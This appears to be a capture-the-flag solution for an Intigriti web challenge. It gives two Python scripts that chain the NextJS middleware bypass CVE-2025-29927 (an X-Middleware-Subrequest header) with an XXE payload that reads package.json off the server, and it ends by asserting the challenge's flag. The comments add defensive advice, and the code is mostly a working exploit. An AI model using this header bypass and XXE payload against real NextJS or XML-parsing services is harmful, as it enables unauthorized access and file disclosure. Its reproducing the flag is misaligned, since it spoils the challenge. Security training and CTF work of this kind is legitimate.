Since the website runs on NextJS and offers XML editing, we suspect that recent exploits related to both are what is needed to solve this challenge easily:
# On local host (this variant needs the third-party `requests` package).
#
# A single request chains two weaknesses of the challenge application:
#   1. CVE-2025-29927: the X-Middleware-Subrequest header makes an affected
#      NextJS skip its middleware, so presumably whatever check guards
#      /api/parse-xml never runs. Defensive note: this header has no reason to
#      arrive from outside; upgrade to a patched NextJS release and strip the
#      header at the edge proxy, and treat any inbound request carrying it as
#      an indicator worth alerting on.
#      Reference: gotr00t0day/CVE-2025-29927/blob/main/CVE-2025-29927.py | eliza.how
#   2. XXE: the XML parser resolves the external entity declared in the DOCTYPE
#      and echoes the referenced local file back in the response. Defensive
#      note: disable DTD / external-entity processing in the parser.
#      Reference: bryanmcnulty.github.io/blob/main/_posts/2023-06-24-htb-stocker.md#local-file-disclosure
bypass_headers = {"X-Middleware-Subrequest":"middleware"}
xxe_body = {"xml":"<!DOCTYPE A[<!ENTITY A SYSTEM \"file:///proc/self/cwd/package.json\">]><A>&A;</A>"}
response = __import__("requests").post(
    "https://hackdonalds.intigriti.io/api/parse-xml",
    headers=bypass_headers,
    json=xxe_body,
)
# The "result" field of the reply is itself a JSON document (the package.json
# that was read), so it is parsed a second time; the flag is its "name" value.
package_json = __import__("json").loads(response.json()["result"])
flag = package_json["name"]
# On python3 bellard.org/jslinux/vm.html?url=alpine-x86.cfg
# Standard-library-only variant (presumably because `requests` is not
# available in that VM).
import json
import urllib.request

# X-Middleware-Subrequest is the header abused by CVE-2025-29927 to make NextJS
# skip its middleware; Content-Type has to be set by hand because urllib does
# not JSON-encode the body. Passing `data` makes urllib send a POST.
# Defensive note: strip this header at the edge, run a patched NextJS, and
# disable external-entity resolution in the XML parser behind this endpoint.
request = urllib.request.Request(
    "https://hackdonalds.intigriti.io/api/parse-xml",
    headers={"X-Middleware-Subrequest":"middleware", "Content-Type":"application/json"},
    data=b'''{"xml":"<!DOCTYPE A[<!ENTITY A SYSTEM \\"file:///app/package.json\\">]><A>&A;</A>"}''',
)
raw_reply = urllib.request.urlopen(request).read().decode()
# The reply's "result" field holds the disclosed package.json as a JSON string,
# hence the second json.loads; the flag is stored in its "name" field.
disclosed_package = json.loads(json.loads(raw_reply)["result"])
flag = disclosed_package["name"]
assert flag == "INTIGRITI{XXE_1n_Ic3Cr34m_M4ch1n3s}"